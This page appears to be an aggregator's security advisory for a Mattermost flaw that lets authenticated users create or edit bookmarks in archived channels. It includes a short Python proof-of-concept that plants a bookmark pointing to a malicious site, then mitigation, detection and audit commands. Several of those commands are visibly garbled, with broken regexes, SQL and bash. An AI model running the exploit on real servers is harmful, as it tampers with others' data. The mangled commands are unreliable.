Mattermost versions 10.4.x <= 10.4.2, 10.3.x <= 10.3.3, 9.11.x <= 9.11.8, and 10.5.x <= 10.5.0 contain a vulnerability where the system fails to enforce proper access controls on bookmark creation and updates in archived channels. This allows authenticated users to create or modify bookmarks in channels that have been archived, bypassing the intended restrictions. Archived channels are typically meant to be read-only, and this flaw undermines the integrity of the archiving feature. The issue arises due to insufficient validation checks when handling bookmark-related API requests for archived channels. This vulnerability could lead to unintended data modifications or misuse of archived content, potentially disrupting workflows or violating data governance policies.
DailyCVE Form:
Platform: Mattermost
Version: 10.4.0 – 10.4.2, 10.3.0 – 10.3.3, 9.11.0 – 9.11.8, 10.5.0
Vulnerability: Improper Access Control
Severity: Moderate
Date: Mar 21, 2025
What Undercode Say:
Exploitation:
1. Exploit Code:
import requests
url = "https://<mattermost-server>/api/v4/channels/<archived-channel-id>/bookmarks"
headers = {"Authorization": "Bearer <access-token>"}
payload = {"name": "Exploit Bookmark", "url": "https://malicious.site"}
response = requests.post(url, headers=headers, json=payload)
if response.status_code == 200:
print("Bookmark created in archived channel!")
else:
print("Exploit failed.")
2. Steps to Exploit:
- Obtain an authenticated session token.
- Identify an archived channel ID.
- Use the API endpoint to create or update bookmarks in the archived channel.
Mitigation:
1. Update Mattermost:
Upgrade to patched versions: 10.4.3, 10.3.4, 9.11.9, or 10.5.1.
2. Temporary Workaround:
- Disable bookmark functionality for archived channels via custom scripts or plugins.
- Implement additional API request validation on the server side.
3. Detection:
- Monitor API logs for unauthorized bookmark creation/updates in archived channels.
- Use the following command to check for vulnerable versions:
curl -s https://<mattermost-server>/api/v4/config/client | grep -E '"Version":"(10.4.[bash]|10.3.[bash]|9.11.[bash]|10.5.0)"'
4. Protection Commands:
- Restrict API access to archived channels:
iptables -A INPUT -p tcp --dport 8065 -m string --string "/api/v4/channels/" --algo bm -j DROP
- Apply role-based access control (RBAC) to limit bookmark permissions.
5. Audit:
- Review existing bookmarks in archived channels:
SELECT FROM bookmarks WHERE channel_id IN (SELECT id FROM channels WHERE archived = true);
6. Automated Patch Verification:
- Use the following script to verify the patch:
!/bin/bash VERSION=$(curl -s https://<mattermost-server>/api/v4/config/client | grep -oP '"Version":"\K[bash]+') if [bash]]; then echo "Mattermost is patched." else echo "Mattermost is vulnerable." fi
By following these steps, organizations can mitigate the risk posed by this vulnerability and ensure the integrity of their Mattermost instance.
References:
Reported By: https://github.com/advisories/GHSA-rp74-x43m-cpw3
Extra Source Hub:
Undercode
